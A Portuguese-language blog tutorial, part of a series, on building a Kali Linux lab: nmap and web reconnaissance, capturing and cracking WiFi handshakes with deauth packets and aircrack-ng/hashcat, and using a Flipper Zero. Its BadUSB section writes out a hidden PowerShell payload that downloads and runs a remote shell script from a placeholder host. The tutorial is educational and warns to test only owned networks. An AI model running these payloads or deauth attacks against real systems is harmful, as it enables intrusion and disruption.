Menu
Sobre Serviços Trajetória Trabalhe Comigo
Linux terminal with code
Segurança 7 mar, 2026 • 25 min de leitura

Fundamentos do Kali Linux: Construa Seu Laboratório de Hacking

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Compartilhar:
Lee Foropoulos

Lee Foropoulos

25 min de leitura

O Caminho do Hacker: Série em 5 Partes

Parte 1: IntroduçãoParte 2: Domínio do FlipperParte 3: Fundamentos do KaliParte 4: ExploraçãoParte 5: A Auditoria Completa

Nas Partes 1 e 2, você clonou cartões, analisou frequências de rádio e entendeu por que a maior parte da "segurança" é teatro. Você viu as vulnerabilidades de fora. Agora entra dentro e as vê da perspectiva do atacante.

O Kali Linux é a distribuição padrão da indústria para testes de penetração. Vem pré-carregado com mais de 600 ferramentas de segurança. Isso pode parecer esmagador. A maioria dos tutoriais te joga na parte funda com comandos que você não entende e sem contexto sobre por que importam.

Estamos fazendo isso de forma diferente. No final deste artigo, você terá um laboratório funcional, entenderá reconhecimento de rede em nível fundamental e terá capturado seu próprio WiFi handshake. Cada passo se constrói sobre o anterior.

A maioria dos tutoriais te joga na parte funda com comandos que você não entende e sem contexto sobre por que importam. Cada passo aqui se constrói sobre o anterior.

Parte 1: Construindo Seu Laboratório

Testadores de penetração profissionais não rodam Kali na máquina principal. Eles usam ambientes isolados que podem ser resetados, ter snapshots e ser destruídos sem afetar o sistema primário. Você fará o mesmo.

Opção A: Máquina Virtual (Recomendada para Aprendizado)

Uma máquina virtual oferece o ambiente de aprendizado mais seguro. Você pode salvar snapshots do seu progresso, cometer erros e voltar instantaneamente.

O Que Você Vai Precisar

  • Máquina host: 16GB+ RAM, 50GB+ de espaço livre em disco, CPU moderna com suporte a virtualização
  • Software de virtualização: VirtualBox (gratuito) ou VMware Workstation Player (gratuito para uso pessoal)
  • Kali Linux: VM pré-construída oficial de kali.org

Projeto: Setup da Kali VM

Tempo: 30-45 minutos

Passos:

  1. Baixe a imagem VM do Kali para seu hypervisor (VirtualBox ou VMware)
  2. Extraia o arquivo baixado (7-Zip recomendado para Windows)
  3. Importe a VM no seu hypervisor
  4. Configure recursos: mínimo 4GB RAM (8GB recomendado), 2+ núcleos de CPU
  5. Habilite o adaptador de rede em modo "Bridged" para acesso completo à rede
  6. Inicie a VM e faça login com credenciais padrão: kali / kali
  7. Abra o terminal e execute: sudo apt update && sudo apt full-upgrade -y
  8. Crie um snapshot chamado "Fresh Install" para fácil recuperação

Verificação de sucesso: Você pode abrir um terminal, rodar whoami e ver kali.

Opção B: Hardware Dedicado (Para Prática Séria)

Quando estiver confortável com o Kali, hardware dedicado remove o overhead da VM e habilita acesso completo ao hardware, essencial para testes wireless.

Recomendações de Hardware

Opção econômicaThinkPad X230/T430 usado ($100-150), WiFi Intel substituído por Atheros AR9285
Opção modernaFramework Laptop com módulo WiFi compatível com Linux
Sensor dedicadoRaspberry Pi 5 4GB com adaptador externo Alfa AWUS036ACH

Por enquanto, uma VM é perfeita. Hardware dedicado se torna importante quando você precisa de modo monitor para testes wireless (abordado mais adiante neste artigo).

Opção C: Live USB (Zero Persistência)

Um Live USB roda Kali diretamente sem instalação. Tudo desaparece quando você desliga. Útil para testar em hardware diferente, mas você perderá seu trabalho a cada sessão, a menos que crie uma partição persistente.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

dd Destrói Dados

O comando dd escreve diretamente no disco sem confirmação. Verifique o nome do dispositivo três vezes. Escrever no dispositivo errado vai apagar aquele drive completamente.

Kali Linux terminal with security tools running
Um ambiente Kali Linux configurado corretamente é a fundação de cada teste de penetração profissional.

Parte 2: A Mentalidade do Terminal

Antes de tocar em ferramentas de segurança, você precisa estar confortável no terminal. Isso não é opcional. A GUI existe no Kali, mas o trabalho real acontece na linha de comando.

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

Escalação de Privilégios

Muitas ferramentas de segurança requerem acesso root. No Kali, sudo dá privilégios root temporários.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root com Responsabilidade

Rodar como root significa zero redes de segurança. Um erro de digitação como rm -rf / vai destruir tudo. O Kali moderno previne esse comando específico, mas o princípio permanece: entenda o que está rodando antes de rodar.

Gerenciamento de Processos

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

Comandos de Rede

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

Projeto: Orientação no Terminal

Tempo: 15 minutos

Tarefas:

  1. Encontre seu endereço IP na rede local usando ip a
  2. Identifique seu gateway padrão usando ip route
  3. Faça ping no seu gateway para confirmar conectividade
  4. Liste todos os arquivos em /etc ordenados por tempo de modificação: ls -lt /etc | head
  5. Leia as primeiras 50 linhas de /etc/passwd: head -n 50 /etc/passwd

Objetivo: Você deve ser capaz de navegar, verificar status de rede e ler arquivos sem pensar.

Parte 3: Reconhecimento de Rede com Nmap

Nmap (Network Mapper) é a ferramenta mais importante que você vai aprender. Descobre hosts, identifica serviços, detecta sistemas operacionais e mapeia topologia de rede. Todo o resto se constrói sobre a saída do nmap.

Seu Primeiro Scan

Vamos escanear sua própria rede. Primeiro, identifique o range da sua rede:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

Você verá uma saída assim:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Esse primeiro scan te diz: "Esses dispositivos existem na minha rede." Agora vamos fazer perguntas mais profundas.

Detecção de Serviços

Quando sabe quais hosts existem, você quer saber quais serviços estão rodando.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

Saída comum:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

Detecção de Sistema Operacional

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

Entendendo Estados de Portas

O Nmap reporta portas em vários estados:

  • open - Aplicação aceitando conexões ativamente. É isso que atacantes procuram.
  • closed - Porta acessível mas nenhuma aplicação ouvindo. O host está ativo mas não tem nada lá.
  • filtered - Firewall ou filtro bloqueando a sonda. Não é possível determinar se está aberta ou fechada.
  • unfiltered - Porta acessível mas o nmap não consegue determinar se está aberta ou fechada.

Tipos de Scan e Furtividade

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Nmap Scripting Engine (NSE)

O NSE estende o nmap com scripts especializados para detecção de vulnerabilidades, enumeração de serviços e mais.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

Projeto: Mapeie Sua Rede

Tempo: 30 minutos

Pré-requisitos: Conhecer o range da sua rede a partir de ip a

  1. Descubra todos os hosts: sudo nmap -sn YOUR_NETWORK/24
  2. Liste os hosts descobertos e seus endereços MAC
  3. Escolha seu roteador (geralmente .1) e execute: sudo nmap -sV -sC YOUR_ROUTER
  4. Identifique todas as portas abertas e serviços no seu roteador
  5. Execute sudo nmap -A YOUR_COMPUTER para ver o que sua máquina expõe

Documente: Crie um arquivo texto listando cada dispositivo, seu IP, MAC e serviços. Este é seu mapa de rede.

Escaneie Apenas Redes que Você Possui

Escanear redes sem autorização é ilegal na maioria das jurisdições. Até um scan nmap simples pode ser considerado acesso não autorizado. Fique na sua própria rede, seus próprios equipamentos e redes onde você tem permissão escrita explícita.

Parte 4: Reconhecimento Web

Seu scan nmap provavelmente encontrou serviços HTTP (portas 80, 443, 8080). Vamos entender o que está rodando lá.

Whatweb: Identificação Rápida de Serviço

bash# Identify web technologies
whatweb http://192.168.1.1

Exemplo de saída:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: Scanner de Vulnerabilidades Web

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

Enumeração de Diretórios: O Que Está Escondido?

Servidores web frequentemente têm diretórios não linkados da página principal: painéis de admin, arquivos de configuração, arquivos de backup.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Descobertas comuns:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

Localização das Wordlists

O Kali inclui wordlists extensas em /usr/share/wordlists/. Os diretórios mais comuns: dirb/, dirbuster/, rockyou.txt (senhas) e seclists/ (coleção abrangente).

Projeto: Audite a Interface Web do Seu Roteador

Tempo: 20 minutos

  1. Execute whatweb http://YOUR_ROUTER_IP para identificar o servidor
  2. Execute nikto -h http://YOUR_ROUTER_IP para verificar vulnerabilidades
  3. Execute gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. Visite os diretórios descobertos em um navegador
  5. Anote painéis de admin, números de versão ou descobertas interessantes

Descoberta comum: Páginas de admin do roteador expostas com credenciais padrão.

Server room with network infrastructure
O reconhecimento de rede revela a topologia completa do ambiente alvo, de roteadores a serviços escondidos.

Parte 5: Reconhecimento Wireless

Aqui as coisas ficam interessantes. Redes WiFi transmitem constantemente, e com as ferramentas certas, você pode capturar handshakes de autenticação: a troca criptografada que acontece quando um dispositivo se conecta.

Requisitos de Hardware

Seu WiFi integrado provavelmente não vai funcionar para isso. Você precisa de um adaptador que suporte modo monitor e injeção de pacotes. Recomendados: Alfa AWUS036ACH ($50) ou Alfa AWUS036ACM ($45). Funcionam direto da caixa com o Kali.

Entendendo o Modo Monitor

O modo WiFi normal ("managed mode") só recebe pacotes endereçados ao seu dispositivo. O modo monitor captura todos os pacotes no alcance, o tráfego de cada dispositivo no canal.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

Escaneando Redes

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

O que você está vendo é cada rede WiFi no alcance, suas configurações de segurança e frequentemente os dispositivos conectados. É isso que um war driver vê ao escanear bairros.

Capturando um Handshake

Quando um dispositivo se conecta a uma rede WPA2, há um four-way handshake. Se você capturar esse handshake, pode tentar crackear a senha offline.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

Quando você captura um handshake, o airodump-ng mostra [ WPA handshake: XX:XX:XX:XX:XX:XX ] no canto superior direito.

Ataques Deauth São Ilegais

Enviar pacotes de desautenticação para redes que não são suas é crime federal sob o Computer Fraud and Abuse Act (nos EUA) e leis similares em outros lugares. Teste apenas na sua própria rede. O objetivo é entender a vulnerabilidade, não atacar outros.

Crackeando o Handshake

Com um handshake capturado, você pode tentar crackear a senha offline usando uma wordlist:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
Senhas reais de vazamentos de dados reais estão incluídas no rockyou.txt, a wordlist padrão usada para crackear WiFi handshakes capturados.

Verificação de Realidade sobre Força de Senhas

rockyou.txt contém 14+ milhões de senhas de vazamentos de dados reais. Se sua senha WiFi é "password123" ou "summer2024" ou o nome do seu cachorro, pode ser crackeada em segundos. Uma senha aleatória de 12+ caracteres levaria milhões de anos para brute-force.

Projeto: Teste a Segurança do Seu WiFi

Tempo: 45 minutos

Pré-requisitos: Adaptador WiFi externo com suporte a modo monitor

  1. Habilite o modo monitor: sudo airmon-ng start wlan0
  2. Escaneie as redes: sudo airodump-ng wlan0mon
  3. Anote o canal e BSSID da sua rede
  4. Capture no seu canal: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. Reconecte um dispositivo ao seu WiFi (ou use deauth na SUA rede)
  6. Confirme a captura do handshake
  7. Teste contra o rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

Resultado: Se sua senha foi encontrada, mude imediatamente para algo aleatório e longo (20+ caracteres).

Parte 6: Conectando Seu Flipper Zero

Lembra de todas aquelas capturas da Parte 2? Vamos integrá-las ao seu workflow com o Kali.

Transferindo Arquivos

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

Analisando Dumps NFC

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Análise Sub-GHz

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

Desenvolvimento BadUSB

Crie payloads BadUSB no Kali, teste no Flipper:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

Payloads BadUSB São Poderosos

Esses scripts se executam automaticamente quando plugados. Um payload malicioso pode instalar backdoors, roubar credenciais ou destruir dados em segundos. Use apenas nas suas próprias máquinas para testes. Nunca deixe seu Flipper onde outra pessoa possa plugá-lo.

Parte 7: Documentação e Workflow

Testadores de penetração profissionais não apenas rodam ferramentas. Eles documentam tudo. Boa documentação separa amadores de profissionais.

Anotações com CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Salvando Saída do Nmap

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

Log de Sessão

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

O Caminho do Hacker

Uma série em 5 partes que te leva de curioso a capaz.

Parte 1: Introdução Parte 2: Domínio do Flipper Parte 3: Fundamentos do Kali ✓ Parte 4: Exploração Parte 5: Auditoria Completa

Checklist da Parte 3

☐ Setup do Lab: Kali VM rodando, atualizada, snapshot salvo

☐ Terminal: Confortável com navegação, permissões, controle de processos

☐ Nmap: Rede mapeada, serviços identificados, roteador escaneado

☐ Recon Web: Interface web do roteador analisada com whatweb/nikto

☐ Wireless: Modo monitor habilitado, redes escaneadas

☐ Handshake: Próprio WiFi handshake capturado e testado

☐ Flipper: Arquivos transferidos, workflow compreendido

☐ Documentação: Notas organizadas, scans salvos

Plano de Ação Fundamentos do Kali 0/6

O Que Vem Depois

Você construiu seu laboratório e aprendeu a fase de reconhecimento. Pode descobrir hosts, identificar serviços e capturar handshakes wireless. Entende o que atacantes veem quando olham para uma rede.

Na Parte 4, passamos do reconhecimento para a exploração. Você vai aprender:

  • Metasploit Framework, o canivete suíço da exploração
  • Workflows comuns de exploração de vulnerabilidades
  • Técnicas de pós-exploração: o que acontece após o acesso inicial
  • Escalação de privilégios: de usuário normal a administrador
  • Pivoting: usar um sistema comprometido para atacar outros

O reconhecimento te diz onde estão as portas. A exploração te ensina como atravessá-las.

Você mapeou o território. Agora aprende a navegar nele. A Parte 4 te leva de observador a operador.

Nos vemos na Parte 4.

How was this article?

Compartilhar

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Nao perca nenhuma publicacao

Receba notificacoes quando novos artigos forem publicados. Sem necessidade de email.

Voce vera um banner no site quando houver um novo post, alem de uma notificacao do navegador se permitir.

Apenas notificacoes do navegador. Sem spam.